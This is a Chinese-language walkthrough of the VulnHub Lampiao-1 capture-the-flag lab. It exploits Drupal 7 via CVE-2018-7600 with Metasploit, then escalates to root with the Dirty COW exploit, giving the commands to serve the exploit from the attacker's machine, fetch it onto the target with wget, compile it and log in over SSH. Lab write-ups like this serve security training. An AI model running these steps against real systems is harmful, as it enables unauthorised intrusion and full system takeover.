靶场
https://www.vulnhub.com/entry/lampiao-1,249/
打开虚拟机后,显示需要登录
使用nmap扫描,靶场搭建在内网环境
扫描结果
再扫描开放端口
访问端口1898
查看web指纹,发现CMS是Drupal 7
drupal 7 漏洞getshell
搜索有关drupal 7 的漏洞,发现CVE-2018-7600可以实现远程代码执行
- 用户填写表单->表单没有问题->返回注册成功页面
- 用户填写表单->表单内容有问题(例如用户名已被注册)->调用buildform方法,把用户传入的内容一同构造为表单数组->渲染表单数组为html页面返回
该漏洞是Form API在用户提交表单数据时可以在表单渲染过程中修改表单数据
想利用该漏洞,就需要在表单结构中的某个地方注入渲染数组,所以,首先要找到注入位置
使用msf进行漏洞利用
设置
执行
获取shell
查看版本信息,时间2016.10.18,可能存在脏牛漏洞
脏牛漏洞
kali搜索cow
将脚本拷贝到root,方便一会获取
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/
使用python传输exp
python -m SimpleHTTPServer 8888
靶机获取文件
wget http://192.168.16.150:8888/40847.cpp
可以看到接收到的脚本文件
编译利用
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
#-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
#-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
#-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
#-std=c++11 按C++2011标准来编译的
#-pthread 在Linux中要用到多线程时,需要链接pthread库
#-o 40847 gcc生成的目标文件,名字为40847
使用,得到root修改后的密码
ssh远程登录
查看flag